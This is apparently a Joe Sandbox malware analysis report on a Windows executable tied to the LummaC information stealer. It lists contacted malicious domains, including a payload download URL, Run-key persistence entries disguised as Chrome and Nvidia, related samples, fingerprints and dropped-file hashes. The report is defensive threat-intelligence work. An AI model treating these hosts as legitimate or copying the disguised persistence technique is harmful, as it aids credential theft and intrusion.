https://www.youtube.com/watch?v=wjIuS_rQQsYC:	89TY9V9WIQJRU6EB7DK4LP.exe, 00000006.00000002.2148856128.0000000000BC0000.00000004.00000020.00020000.00000000.sdmp, Q13Hi3dPshjDHTjm.exe, 0000000A.00000002.2255270179.0000000000A10000.00000004.00000020.00020000.00000000.sdmp, 89TY9V9WIQJRU6EB7DK4LP.exe, 00000024.00000002.2422010886.0000000000B80000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.amazon.com/	msapplication.xml8.9.dr	false		high
https://gamertool.eu/N	89TY9V9WIQJRU6EB7DK4LP.exe, 00000006.00000002.2148894841.0000000000E0D000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	T4qO1i2Jav.exe, 00000000.00000003.1815823994.0000000003B49000.00000004.00000800.00020000.00000000.sdmp, T4qO1i2Jav.exe, 00000000.00000003.1815689007.0000000003B4B000.00000004.00000800.00020000.00000000.sdmp, T4qO1i2Jav.exe, 00000000.00000003.1815756384.0000000003B49000.00000004.00000800.00020000.00000000.sdmp	false		high
https://itsrevolutionmagnus.xyz/Nkeeei.exeF	T4qO1i2Jav.exe, 00000000.00000002.2085901381.0000000000992000.00000004.00000020.00020000.00000000.sdmp, T4qO1i2Jav.exe, 00000000.00000003.2084081640.0000000000991000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://store.steampowered.com/subscriber_agreement/	T4qO1i2Jav.exe, 00000000.00000003.1771294431.00000000009C7000.00000004.00000020.00020000.00000000.sdmp, T4qO1i2Jav.exe, 00000000.00000003.1792826964.00000000009D7000.00000004.00000020.00020000.00000000.sdmp, T4qO1i2Jav.exe, 00000000.00000003.1771294431.00000000009CC000.00000004.00000020.00020000.00000000.sdmp, T4qO1i2Jav.exe, 00000000.00000003.1771392328.0000000000981000.00000004.00000020.00020000.00000000.sdmp, T4qO1i2Jav.exe, 00000000.00000003.1792887999.0000000000981000.00000004.00000020.00020000.00000000.sdmp	false		high
https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org	T4qO1i2Jav.exe, 00000000.00000003.1771294431.00000000009C7000.00000004.00000020.00020000.00000000.sdmp, T4qO1i2Jav.exe, 00000000.00000003.1792826964.00000000009D7000.00000004.00000020.00020000.00000000.sdmp, T4qO1i2Jav.exe, 00000000.00000003.1771294431.00000000009CC000.00000004.00000020.00020000.00000000.sdmp, T4qO1i2Jav.exe, 00000000.00000003.1771392328.0000000000981000.00000004.00000020.00020000.00000000.sdmp, T4qO1i2Jav.exe, 00000000.00000003.1792887999.0000000000981000.00000004.00000020.00020000.00000000.sdmp	false		high
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17	T4qO1i2Jav.exe, 00000000.00000003.1816105164.0000000003BA3000.00000004.00000800.00020000.00000000.sdmp, T4qO1i2Jav.exe, 00000000.00000003.1816227681.0000000003B57000.00000004.00000800.00020000.00000000.sdmp, T4qO1i2Jav.exe, 00000000.00000003.1840812297.0000000003B57000.00000004.00000800.00020000.00000000.sdmp	false		high
https://recaptcha.net/recaptcha/;	T4qO1i2Jav.exe, 00000000.00000003.1771328797.0000000000985000.00000004.00000020.00020000.00000000.sdmp, T4qO1i2Jav.exe, 00000000.00000003.1771328797.0000000000992000.00000004.00000020.00020000.00000000.sdmp	false		high
https://steamcommunity.com/discussions/	T4qO1i2Jav.exe, 00000000.00000003.1792826964.00000000009D7000.00000004.00000020.00020000.00000000.sdmp, T4qO1i2Jav.exe, 00000000.00000003.1771294431.00000000009CC000.00000004.00000020.00020000.00000000.sdmp	false		high
https://lev-tolstoi.com/apider	T4qO1i2Jav.exe, 00000000.00000003.1900708878.00000000009F0000.00000004.00000020.00020000.00000000.sdmp, T4qO1i2Jav.exe, 00000000.00000003.2083825827.00000000009DD000.00000004.00000020.00020000.00000000.sdmp, T4qO1i2Jav.exe, 00000000.00000002.2086122592.00000000009F1000.00000004.00000020.00020000.00000000.sdmp, T4qO1i2Jav.exe, 00000000.00000003.2058998359.00000000009EE000.00000004.00000020.00020000.00000000.sdmp, T4qO1i2Jav.exe, 00000000.00000003.1932172600.00000000009F1000.00000004.00000020.00020000.00000000.sdmp, T4qO1i2Jav.exe, 00000000.00000003.2084009300.00000000009E8000.00000004.00000020.00020000.00000000.sdmp, T4qO1i2Jav.exe, 00000000.00000003.2058881726.00000000009DD000.00000004.00000020.00020000.00000000.sdmp, T4qO1i2Jav.exe, 00000000.00000003.1900549907.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, T4qO1i2Jav.exe, 00000000.00000003.1946533444.00000000009F1000.00000004.00000020.00020000.00000000.sdmp, T4qO1i2Jav.exe, 00000000.00000003.2058980451.00000000009E8000.00000004.00000020.00020000.00000000.sdmp, T4qO1i2Jav.exe, 00000000.00000003.1900590719.00000000009EF000.00000004.00000020.00020000.00000000.sdmp, T4qO1i2Jav.exe, 00000000.00000003.2084026449.00000000009EE000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://store.steampowered.com/stats/	T4qO1i2Jav.exe, 00000000.00000003.1792826964.00000000009D7000.00000004.00000020.00020000.00000000.sdmp, T4qO1i2Jav.exe, 00000000.00000003.1771294431.00000000009CC000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/shared/javascript/shared_global.js?v=Gr6TbGRvDtNE&am	T4qO1i2Jav.exe, 00000000.00000003.1792826964.00000000009D7000.00000004.00000020.00020000.00000000.sdmp, T4qO1i2Jav.exe, 00000000.00000003.1771294431.00000000009CC000.00000004.00000020.00020000.00000000.sdmp	false		high
https://login.microsoftonline.com/common/oauth2/authorize?client_id=9ea1ad79-fdb6-4f9a-8bc3-2b70f96e	{856608C8-C458-11EF-8C2C-ECF4BBEA1588}.dat.37.dr	false		high
https://medal.tv	T4qO1i2Jav.exe, 00000000.00000003.1771328797.0000000000985000.00000004.00000020.00020000.00000000.sdmp, T4qO1i2Jav.exe, 00000000.00000003.1771328797.0000000000992000.00000004.00000020.00020000.00000000.sdmp	false		high
https://broadcast.st.dl.eccdnx.com	T4qO1i2Jav.exe, 00000000.00000003.1771328797.0000000000985000.00000004.00000020.00020000.00000000.sdmp, T4qO1i2Jav.exe, 00000000.00000003.1771328797.0000000000992000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png	T4qO1i2Jav.exe, 00000000.00000003.1792826964.00000000009D7000.00000004.00000020.00020000.00000000.sdmp, T4qO1i2Jav.exe, 00000000.00000003.1771294431.00000000009CC000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/css/skin_1/header.css?v=EM4kCu67DNda&l=english&a	T4qO1i2Jav.exe, 00000000.00000003.1792826964.00000000009D7000.00000004.00000020.00020000.00000000.sdmp, T4qO1i2Jav.exe, 00000000.00000003.1771294431.00000000009CC000.00000004.00000020.00020000.00000000.sdmp	false		high
https://store.steampowered.com/steam_refunds/	T4qO1i2Jav.exe, 00000000.00000003.1792826964.00000000009D7000.00000004.00000020.00020000.00000000.sdmp, T4qO1i2Jav.exe, 00000000.00000003.1771294431.00000000009CC000.00000004.00000020.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
172.67.157.254	lev-tolstoi.com	United States	13335	CLOUDFLARENETUS	false
172.67.182.218	itsrevolutionmagnus.xyz	United States	13335	CLOUDFLARENETUS	true
172.67.161.29	gamertool.eu	United States	13335	CLOUDFLARENETUS	false
89.23.100.42	unknown	Russian Federation	48687	MAXITEL-ASRU	false
162.159.61.3	unknown	United States	13335	CLOUDFLARENETUS	false
239.255.255.250	unknown	Reserved	unknown	unknown	false
23.55.153.106	steamcommunity.com	United States	20940	AKAMAI-ASN1EU	false
142.250.181.65	googlehosted.l.googleusercontent.com	United States	15169	GOOGLEUS	false
172.64.41.3	chrome.cloudflare-dns.com	United States	13335	CLOUDFLARENETUS	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1581379
Start date and time:	2024-12-27 14:41:11 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 10m 34s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	53
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	T4qO1i2Jav.exe renamed because original name is a hash value
Original Sample Name:	2d883950e8e1886bb567d041d17f22db.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@103/556@21/9
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 99% Number of executed functions: 74 Number of non-executed functions: 204
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 23.218.210.69, 2.16.158.184, 2.16.158.90, 2.16.158.82, 2.16.158.169, 2.16.158.80, 2.16.158.88, 2.16.158.170, 2.16.158.179, 2.16.158.83, 13.107.42.16, 13.107.21.239, 204.79.197.239, 142.250.181.142, 2.16.158.75, 204.79.197.200, 2.19.198.203, 23.32.238.73, 2.16.158.59, 2.16.158.186, 2.16.158.27, 2.16.158.35, 2.16.158.56, 2.16.158.72, 2.16.158.26, 2.16.158.33, 2.16.158.51, 2.16.158.74, 20.190.147.2, 20.190.177.146, 20.190.147.0, 20.190.177.82, 20.190.177.148, 20.190.147.6, 20.190.177.22, 20.190.147.10, 13.89.179.12, 172.217.17.42, 172.217.17.74, 172.217.19.202, 216.58.208.234, 142.250.181.138, 172.217.19.10, 172.217.19.234, 142.250.181.10, 142.250.181.42, 142.250.181.74, 142.250.181.106, 172.217.21.42, 2.16.158.176, 2.16.158.96, 20.42.73.29, 2.16.158.187, 2.16.158.43, 142.251.41.3, 142.251.40.131, 172.217.165.131, 142.251.32.99, 142.251.40.163, 52.149.20.212, 13.107.246.63, 23.218.208.109, 13.107.246.40, 40.126.53.9, 23.200.0.33
Excluded domains from analysis (whitelisted): cdp-f-ssl-tlu-net.trafficmanager.net, config.edge.skype.com.trafficmanager.net, slscr.update.microsoft.com, p-static.bing.trafficmanager.net, onedsblobprdcus17.centralus.cloudapp.azure.com, ak.privatelink.msidentity.com, star.sf.tlu.dl.delivery.mp.microsoft.com.delivery.microsoft.com, e11290.dspg.akamaiedge.net, go.microsoft.com, e86303.dscx.akamaiedge.net, clients2.google.com, ocsp.digicert.com, www.bing.com.edgekey.net, login.live.com, config-edge-skype.l-0007.l-msedge.net, th.bing.com, r.bing.com, onedsblobprdeus15.eastus.cloudapp.azure.com, login.mso.msidentity.com, www.gstatic.com, l-0007.l-msedge.net, ieonline.microsoft.com, config.edge.skype.com, www.bing.com, edge-microsoft-com.dual-a-0036.a-msedge.net, www.tm.ak.prd.aadg.trafficmanager.net, fs.microsoft.com, th.bing.com.edgekey.net, otelrules.azureedge.net, r.bing.com.edgekey.net, star.sb.tlu.dl.delivery.mp.microsoft.com.edgesuite.net, ctldl.windowsupdate.com, p-th.bing.com.trafficmanager.net, www.googlea
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtSetValueKey calls found.
Report size getting too big, too many NtWriteVirtualMemory calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
08:42:08	API Interceptor	19x Sleep call for process: T4qO1i2Jav.exe modified
08:42:43	API Interceptor	1765x Sleep call for process: hYDFhjqVouJ7cB7Z.exe modified
08:43:04	API Interceptor	8x Sleep call for process: VBJU2N3euXB4jMxu.exe modified
08:43:35	API Interceptor	2x Sleep call for process: WerFault.exe modified
08:43:35	API Interceptor	12x Sleep call for process: YOB9kZKIRUqnzMwq.exe modified
13:42:48	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run GoogleChrome C:\Users\user\AppData\Local\Temp\pAXokq4A\hYDFhjqVouJ7cB7Z.exe
13:43:00	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run NvidiaDriver C:\Users\user\AppData\Local\Temp\89TY9V9WIQJRU6EB7DK4LP.exe
13:43:11	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run MicrosoftEdgeAutoLaunch_C366A24065C39A1BE76E148DC2D0A868 "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window --win-session-start /prefetch:5
13:43:22	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run GoogleChrome C:\Users\user\AppData\Local\Temp\pAXokq4A\hYDFhjqVouJ7cB7Z.exe
13:43:31	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run NvidiaDriver C:\Users\user\AppData\Local\Temp\89TY9V9WIQJRU6EB7DK4LP.exe
13:43:42	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run MicrosoftEdgeAutoLaunch_C366A24065C39A1BE76E148DC2D0A868 "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window --win-session-start /prefetch:5
13:43:53	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\GoogleChrome.lnk
13:44:05	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NvidiaDriver.lnk

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
172.67.157.254	k0ukcEH.exe	Get hash	malicious	LummaC	Browse
	pVbAZEFIpI.exe	Get hash	malicious	LummaC	Browse
	MaZjv5XeQi.exe	Get hash	malicious	LummaC	Browse
	jT7sgjdTea.exe	Get hash	malicious	LummaC	Browse
	Y4svWfRK1L.exe	Get hash	malicious	LummaC	Browse
	YKri2nEBWE.exe	Get hash	malicious	LummaC	Browse
	GtEVo1eO2p.exe	Get hash	malicious	LummaC	Browse
	SPFFah2O2q.exe	Get hash	malicious	LummaC	Browse
	4KDKJjRzm8.exe	Get hash	malicious	LummaC	Browse
	i8Vwc7iOaG.exe	Get hash	malicious	LummaC, Amadey, AsyncRAT, LummaC Stealer, Stealc, StormKitty, Vidar	Browse
89.23.100.42	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, PureLog Stealer, Stealc	Browse
89.23.100.42	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc	Browse
162.159.61.3	aD7D9fkpII.exe	Get hash	malicious	Vidar	Browse
	installer.bat	Get hash	malicious	Vidar	Browse
	skript.bat	Get hash	malicious	Vidar	Browse
	lem.exe	Get hash	malicious	Vidar	Browse
	HVlonDQpuI.exe	Get hash	malicious	Vidar	Browse
	PodcastsTries.exe	Get hash	malicious	Vidar	Browse
	ChoForgot.exe	Get hash	malicious	Vidar	Browse
	gVKsiQIHqe.exe	Get hash	malicious	Vidar	Browse
	trZG6pItZj.exe	Get hash	malicious	Vidar	Browse
	Loader.exe	Get hash	malicious	RHADAMANTHYS	Browse
239.255.255.250	https://www.solutionfun.info/landingpage/88d166e1-2419-40aa-9b2d-6e9955c2aba8/Kowu_RY0atl7IwT3gv1Oxj31WsMvyYvLoFt-RCYljqI	Get hash	malicious	Unknown	Browse
	https://linkenbio.net/59125/247	Get hash	malicious	Unknown	Browse
	https://dnsextension.pro/invoice/d2d0bf8701b34bc296ca83b956c10720	Get hash	malicious	Unknown	Browse
	DOTA2#U89c6#U8ddd#U63d2#U4ef6.exe	Get hash	malicious	Unknown	Browse
	https://online-ops.mypasschange.com/landingPage/2/fbb0559ebe1911efb53c0242ac190102	Get hash	malicious	Unknown	Browse
	https://online-ops.mypasschange.com/landingPage/2/fbb0559ebe1911efb53c0242ac190102	Get hash	malicious	Unknown	Browse
	https://online-ops.mypasschange.com/landingPage/2/fbb0559ebe1911efb53c0242ac190102	Get hash	malicious	Unknown	Browse
	5uVReRlvME.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, PureLog Stealer, Remcos, Stealc	Browse
	0A7XTINw3R.exe	Get hash	malicious	Unknown	Browse
	RDb082EApV.exe	Get hash	malicious	LummaC	Browse
172.67.161.29	SC3sPWT51E.exe	Get hash	malicious	LummaC Stealer	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
lev-tolstoi.com	FXdg37pY22.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.66.86
	k0ukcEH.exe	Get hash	malicious	LummaC	Browse	172.67.157.254
	pVbAZEFIpI.exe	Get hash	malicious	LummaC	Browse	172.67.157.254
	GxX48twWHA.exe	Get hash	malicious	LummaC	Browse	104.21.66.86
	ERTL09tA59.exe	Get hash	malicious	LummaC	Browse	104.21.66.86
	MaZjv5XeQi.exe	Get hash	malicious	LummaC	Browse	104.21.66.86
	jT7sgjdTea.exe	Get hash	malicious	LummaC	Browse	172.67.157.254
	Y4svWfRK1L.exe	Get hash	malicious	LummaC	Browse	172.67.157.254
	YKri2nEBWE.exe	Get hash	malicious	LummaC	Browse	172.67.157.254
	0c8cY5GOMh.exe	Get hash	malicious	LummaC	Browse	104.21.66.86
gamertool.eu	SC3sPWT51E.exe	Get hash	malicious	LummaC Stealer	Browse	172.67.161.29
gamertool.eu	file.exe	Get hash	malicious	Amadey, LummaC Stealer	Browse	104.21.9.168
chrome.cloudflare-dns.com	aD7D9fkpII.exe	Get hash	malicious	Vidar	Browse	172.64.41.3
	installer.bat	Get hash	malicious	Vidar	Browse	172.64.41.3
	skript.bat	Get hash	malicious	Vidar	Browse	162.159.61.3
	din.exe	Get hash	malicious	Vidar	Browse	172.64.41.3
	lem.exe	Get hash	malicious	Vidar	Browse	162.159.61.3
	WRD1792.docx.doc	Get hash	malicious	Dynamer	Browse	162.159.61.3
	HVlonDQpuI.exe	Get hash	malicious	Vidar	Browse	172.64.41.3
	PodcastsTries.exe	Get hash	malicious	Vidar	Browse	162.159.61.3
	https://jkqbjwq.maxiite.com	Get hash	malicious	HTMLPhisher	Browse	172.64.41.3
	ChoForgot.exe	Get hash	malicious	Vidar	Browse	172.64.41.3
steamcommunity.com	FXdg37pY22.exe	Get hash	malicious	LummaC Stealer	Browse	23.55.153.106
	FXdg37pY22.exe	Get hash	malicious	LummaC Stealer	Browse	23.55.153.106
	k0ukcEH.exe	Get hash	malicious	LummaC	Browse	23.55.153.106
	8WRONDszv4.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, PureLog Stealer, Stealc, zgRAT	Browse	23.55.153.106
	pVbAZEFIpI.exe	Get hash	malicious	LummaC	Browse	104.102.49.254
	GxX48twWHA.exe	Get hash	malicious	LummaC	Browse	104.102.49.254
	RUUSfr6dVm.exe	Get hash	malicious	LummaC	Browse	104.102.49.254
	9idglWFv95.exe	Get hash	malicious	LummaC	Browse	104.102.49.254
	tJd3ArrDAm.exe	Get hash	malicious	LummaC	Browse	104.102.49.254
	gdtJGo7jH3.exe	Get hash	malicious	LummaC	Browse	104.102.49.254

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	EB2UOXRNsE.exe	Get hash	malicious	Unknown	Browse	104.21.112.1
	FXdg37pY22.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.66.86
	gshv2.exe	Get hash	malicious	Unknown	Browse	162.159.129.233
	OiMp3TH.exe	Get hash	malicious	LummaC	Browse	172.67.216.236
	https://dnsextension.pro/invoice/d2d0bf8701b34bc296ca83b956c10720	Get hash	malicious	Unknown	Browse	104.21.31.138
	k0ukcEH.exe	Get hash	malicious	LummaC	Browse	172.67.157.254
	appFile.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.94.92
	FloydMounts.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.25.41
	5uVReRlvME.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, PureLog Stealer, Remcos, Stealc	Browse	172.67.165.185
	0A7XTINw3R.exe	Get hash	malicious	Unknown	Browse	104.26.8.44
CLOUDFLARENETUS	EB2UOXRNsE.exe	Get hash	malicious	Unknown	Browse	104.21.112.1
	FXdg37pY22.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.66.86
	gshv2.exe	Get hash	malicious	Unknown	Browse	162.159.129.233
	OiMp3TH.exe	Get hash	malicious	LummaC	Browse	172.67.216.236
	https://dnsextension.pro/invoice/d2d0bf8701b34bc296ca83b956c10720	Get hash	malicious	Unknown	Browse	104.21.31.138
	k0ukcEH.exe	Get hash	malicious	LummaC	Browse	172.67.157.254
	appFile.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.94.92
	FloydMounts.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.25.41
	5uVReRlvME.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, PureLog Stealer, Remcos, Stealc	Browse	172.67.165.185
	0A7XTINw3R.exe	Get hash	malicious	Unknown	Browse	104.26.8.44
CLOUDFLARENETUS	EB2UOXRNsE.exe	Get hash	malicious	Unknown	Browse	104.21.112.1
	FXdg37pY22.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.66.86
	gshv2.exe	Get hash	malicious	Unknown	Browse	162.159.129.233
	OiMp3TH.exe	Get hash	malicious	LummaC	Browse	172.67.216.236
	https://dnsextension.pro/invoice/d2d0bf8701b34bc296ca83b956c10720	Get hash	malicious	Unknown	Browse	104.21.31.138
	k0ukcEH.exe	Get hash	malicious	LummaC	Browse	172.67.157.254
	appFile.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.94.92
	FloydMounts.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.25.41
	5uVReRlvME.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, PureLog Stealer, Remcos, Stealc	Browse	172.67.165.185
	0A7XTINw3R.exe	Get hash	malicious	Unknown	Browse	104.26.8.44

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
a0e9f5d64349fb13191bc781f81f42e1	FXdg37pY22.exe	Get hash	malicious	LummaC Stealer	Browse	172.67.157.254 23.55.153.106 172.67.182.218
	FXdg37pY22.exe	Get hash	malicious	LummaC Stealer	Browse	172.67.157.254 23.55.153.106 172.67.182.218
	OiMp3TH.exe	Get hash	malicious	LummaC	Browse	172.67.157.254 23.55.153.106 172.67.182.218
	k0ukcEH.exe	Get hash	malicious	LummaC	Browse	172.67.157.254 23.55.153.106 172.67.182.218
	https://online-ops.mypasschange.com/landingPage/2/fbb0559ebe1911efb53c0242ac190102	Get hash	malicious	Unknown	Browse	172.67.157.254 23.55.153.106 172.67.182.218
	appFile.exe	Get hash	malicious	LummaC Stealer	Browse	172.67.157.254 23.55.153.106 172.67.182.218
	FloydMounts.exe	Get hash	malicious	LummaC Stealer	Browse	172.67.157.254 23.55.153.106 172.67.182.218
	RDb082EApV.exe	Get hash	malicious	LummaC	Browse	172.67.157.254 23.55.153.106 172.67.182.218
	GnHq2ZaBUl.exe	Get hash	malicious	LummaC	Browse	172.67.157.254 23.55.153.106 172.67.182.218
	vVJvxAfBDM.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc	Browse	172.67.157.254 23.55.153.106 172.67.182.218
37f463bf4616ecd445d4a1937da06e19	EB2UOXRNsE.exe	Get hash	malicious	Unknown	Browse	172.67.182.218 172.67.161.29
	gshv2.exe	Get hash	malicious	Unknown	Browse	172.67.182.218 172.67.161.29
	DOTA2#U89c6#U8ddd#U63d2#U4ef6.exe	Get hash	malicious	Unknown	Browse	172.67.182.218 172.67.161.29
	n5Szx8qsFB.lnk	Get hash	malicious	Unknown	Browse	172.67.182.218 172.67.161.29
	InExYnlM0N.lnk	Get hash	malicious	Unknown	Browse	172.67.182.218 172.67.161.29
	K9esyY0r4G.lnk	Get hash	malicious	Unknown	Browse	172.67.182.218 172.67.161.29
	vreFmptfUu.lnk	Get hash	malicious	DanaBot	Browse	172.67.182.218 172.67.161.29
	aD7D9fkpII.exe	Get hash	malicious	Vidar	Browse	172.67.182.218 172.67.161.29
	installer.bat	Get hash	malicious	Vidar	Browse	172.67.182.218 172.67.161.29
	skript.bat	Get hash	malicious	Vidar	Browse	172.67.182.218 172.67.161.29

Dropped Files

⊘No context

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.8268767090738994
Encrypted:	false
SSDEEP:	96:EX+WFvdNbNpMM9+sVhMzxTMbHdQXIDcQKc67cEQcw3n+HbHg/5ownQcmMIDV9Oyu:EuW1dNsk+nn0k/aQjSKzuiFcZ24IO8o
MD5:	A62B7CCBA129741DD76DC32D2691EEDB
SHA1:	EB95D2BD0AFF3A82CAEEF4C8118E60D67B710222
SHA-256:	1B8384B91F03CC32A3345781FE7F3D5ABBD2D4D86C3AFACD38BB199B012F3503
SHA-512:	6D064CFCD54636A1C5B432C32828C1E5A1289D17042A16CE1751E04A53A2F78869F485D7A5C5F550B95C95BC1839B3735A66BA03C377BD06B5FA8A0C2EC66523
Malicious:	false
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.9.7.8.0.6.1.6.9.8.8.3.2.4.0.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.9.7.8.0.6.1.9.7.2.2.5.0.0.7.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.4.c.1.9.e.b.6.9.-.d.4.4.7.-.4.0.2.7.-.b.d.4.6.-.a.a.b.b.a.6.d.e.0.a.f.f.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.4.2.2.6.f.6.3.f.-.e.3.e.7.-.4.e.f.f.-.b.9.3.2.-.e.5.f.0.9.a.c.4.e.6.9.f.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.V.B.J.U.2.N.3.e.u.X.B.4.j.M.x.u...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.7.d.0.-.0.0.0.1.-.0.0.1.4.-.5.f.c.0.-.f.d.3.e.6.5.5.8.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.b.a.0.f.c.7.9.e.9.6.6.1.5.6.a.f.7.3.f.d.c.f.9.0.e.c.1.b.c.a.0.b.0.0.0.0.f.f.f.f.!.0.0.0.0.9.3.2.b.d.c.0.f.e.a.8.8.7.6.5.b.8.b.3.c.1.9.f.9.5.4.d.4.3.5.7.9.5.0.3.4.5.0.1.c.!.V.B.J.U.2.N.3.e.u.X.B.4.j.M.x.u...e.x.

Process:	C:\Program Files\Internet Explorer\iexplore.exe
File Type:	MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
Category:	dropped
Size (bytes):	4286
Entropy (8bit):	3.8046022951415335
Encrypted:	false
SSDEEP:	24:suZOWcCXPRS4QAUs/KBy3TYI42Apvl6wheXpktCH2Yn4KgISQggggFpz1k9PAYHu:HBRh+sCBykteatiBn4KWi1+Ne
MD5:	DA597791BE3B6E732F0BC8B20E38EE62
SHA1:	1125C45D285C360542027D7554A5C442288974DE
SHA-256:	5B2C34B3C4E8DD898B664DBA6C3786E2FF9869EFF55D673AA48361F11325ED07
SHA-512:	D8DC8358727590A1ED74DC70356AEDC0499552C2DC0CD4F7A01853DD85CEB3AEAD5FBDC7C75D7DA36DB6AF2448CE5ABDFF64CEBDCA3533ECAD953C061A9B338E
Malicious:	false
Preview:	...... .... .........(... ...@..... ...................................................................................................................................................................................................N...Sz..R...R...P...N..L..H..DG..........................................................................................R6..U...U...S...R...P...N..L..I..F..B...7...............................................................................S6..V...V...U...S...R...P...N..L..I..F..C...?..:z......................................................................O...W...V...V...U...S...R...P...N..L..I..E..C...?...;..{7..q2$..............................................................T..D..]...S)..p6..J...R...P...N..L..I..E..B..>..;..z7..p2..f,X.........................................................A..O#..N!..N!..N!..P$..q:...P...N..K..I..E..A..=..9..x5..n0..e,...5...................................................Ea.Z,..T$..T$..T

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	21874
Entropy (8bit):	6.060841924484497
Encrypted:	false
